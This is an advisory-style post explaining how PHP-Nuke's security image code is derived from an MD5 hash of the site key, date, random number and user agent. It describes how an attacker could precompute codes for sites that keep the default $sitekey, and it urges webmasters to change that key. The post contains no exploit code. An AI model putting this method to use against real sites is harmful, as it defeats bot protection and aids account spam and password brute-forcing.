PHP-Nuke Security GFX Mapping - Potential Risk

In an attempt to prevent scripted bots from either generating new user accounts or attempting brute force password cracking against PHP-Nuke portals, the security graphic had been added in several versions ago. To establish an understanding of what that is, here is an image:





The process begins within the PHP code to generate a random number. That number is then stored in a URL that is resent to the security image creation engine as the login page is being generated:

modules.php?name=Your_Account&op=gfx&random_num=604071

The security graphic engine takes the random number and makes an MD5 encryption of it concatenated with other elements such as the $sitekey, $datekey, and the member's http_user_agent.

At this point the MD5 hash value is switched over to hexadecimal and stored in a variable whereby at a certain starting point (2 by default) a total of x places are read and stored (by default 6).

A potential security risk exists if the default $sitekey value is not changed because a malicious user can manually map out on a PHP-Nuke portal in a one to one relationship between random_num and the number shown in the image. So long as the following values do not change:


$sitekey
$datekey
$random_num
HTTP_USER_AGENT

The number shown back in the security image will always be the same. Such a mapping would be tedious to complete manually, but the possibility exists nonetheless.

Out of the four variables above, the user can manipulate only two:


$random_num
$HTTP_USER_AGENT

This effectively means that the entire process of mapping out the one to one relationship must occur in a single day due to the $datekey parameter. Each day adds a new value to the hexadecimal/MD5 concatenation process.

Lets take this a step further. If a PHP-Nuke webmaster does not change their default $sitekey parameter this could still open them up to attack. A malicious user may install a default PHP-Nuke portal on their own system and now they have access to manipulate all of the four variables above.

This means they can change the date on their system, altering the $datekey to each day of the year, and manually map out all the random_num values to their respective security image code values. At this point, they have a full database for every day of the year that can be used maliciously against default $sitekey value PHP-Nuke sites. With such data, a script can be written to check the random_num value, ie:

modules.php?name=Your_Account&op=gfx&random_num=604071

And such a script could call up the corresponding security code value thereby rendering the purpose behind it useless.

Conclusion? Change your $sitekey immediately from the default value, and change it often. On Nuke Cops for example, the random_num above, 60407, generates the number 588529 using my HTTP_USER_AGENT for today's date. You will most likely see a different code.